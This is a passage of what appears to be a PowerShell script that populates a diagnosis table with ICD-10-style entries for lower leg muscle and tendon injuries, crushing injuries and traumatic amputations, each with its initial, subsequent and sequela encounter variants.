muscle group at lower leg level, left leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Unspecified injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Strain of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Laceration of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg","Other injury of muscle(s) and tendon(s) of peroneal muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, right leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, right leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, right leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, left leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, left leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, left leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Unspecified injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, right leg","Strain of other muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, right leg","Strain of other muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, right leg","Strain of other muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, left leg","Strain of other muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, left leg","Strain of other muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, left leg","Strain of other muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Strain of other muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Strain of other muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Strain of other muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, right leg","Laceration of other muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, right leg","Laceration of other muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, right leg","Laceration of other muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, left leg","Laceration of other muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, left leg","Laceration of other muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, left leg","Laceration of other muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Laceration of other muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Laceration of other muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Laceration of other muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, right leg","Other injury of other muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, right leg","Other injury of other muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, right leg","Other injury of other muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, left leg","Other injury of other muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, left leg","Other injury of other muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, left leg","Other injury of other muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Other injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Other injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg","Other injury of other muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Unspecified injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Strain of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Laceration of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg","Other injury of unspecified muscle(s) and tendon(s) at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified knee","Crushing injury of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified knee","Crushing injury of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified knee","Crushing injury of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right knee","Crushing injury of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right knee","Crushing injury of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right knee","Crushing injury of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left knee","Crushing injury of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left knee","Crushing injury of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left knee","Crushing injury of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified lower leg","Crushing injury of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified lower leg","Crushing injury of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified lower leg","Crushing injury of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right lower leg","Crushing injury of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right lower leg","Crushing injury of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right lower leg","Crushing injury of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left lower leg","Crushing injury of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left lower leg","Crushing injury of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left lower leg","Crushing injury of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, right lower leg","Complete traumatic amputation at knee level, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, right lower leg","Complete traumatic amputation at knee level, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, right lower leg","Complete traumatic amputation at knee level, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, left lower leg","Complete traumatic amputation at knee level, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, left lower leg","Complete traumatic amputation at knee level, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, left lower leg","Complete traumatic amputation at knee level, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, unspecified lower leg","Complete traumatic amputation at knee level, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, unspecified lower leg","Complete traumatic amputation at knee level, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at knee level, unspecified lower leg","Complete traumatic amputation at knee level, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, right lower leg","Partial traumatic amputation at knee level, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, right lower leg","Partial traumatic amputation at knee level, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, right lower leg","Partial traumatic amputation at knee level, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, left lower leg","Partial traumatic amputation at knee level, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, left lower leg","Partial traumatic amputation at knee level, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, left lower leg","Partial traumatic amputation at knee level, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, unspecified lower leg","Partial traumatic amputation at knee level, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, unspecified lower leg","Partial traumatic amputation at knee level, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at knee level, unspecified lower leg","Partial traumatic amputation at knee level, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, right lower leg","Complete traumatic amputation at level between knee and ankle, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, right lower leg","Complete traumatic amputation at level between knee and ankle, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, right lower leg","Complete traumatic amputation at level between knee and ankle, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, left lower leg","Complete traumatic amputation at level between knee and ankle, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, left lower leg","Complete traumatic amputation at level between knee and ankle, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, left lower leg","Complete traumatic amputation at level between knee and ankle, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, unspecified lower leg","Complete traumatic amputation at level between knee and ankle, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, unspecified lower leg","Complete traumatic amputation at level between knee and ankle, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between knee and ankle, unspecified lower leg","Complete traumatic amputation at level between knee and ankle, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, right lower leg","Partial traumatic amputation at level between knee and ankle, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, right lower leg","Partial traumatic amputation at level between knee and ankle, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, right lower leg","Partial traumatic amputation at level between knee and ankle, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, left lower leg","Partial traumatic amputation at level between knee and ankle, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, left lower leg","Partial traumatic amputation at level between knee and ankle, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, left lower leg","Partial traumatic amputation at level between knee and ankle, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, unspecified lower leg","Partial traumatic amputation at level between knee and ankle, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, unspecified lower leg","Partial traumatic amputation at level between knee and ankle, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between knee and ankle, unspecified lower leg","Partial traumatic amputation at level between knee and ankle, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right lower leg, level unspecified","Complete traumatic amputation of right lower leg, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right lower leg, level unspecified","Complete traumatic amputation of right lower leg, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right lower leg, level unspecified","Complete traumatic amputation of right lower leg, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left lower leg, level unspecified","Complete traumatic amputation of left lower leg, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left lower leg, level unspecified","Complete traumatic amputation of left lower leg, level unspecified, subsequent encounter") + $null = 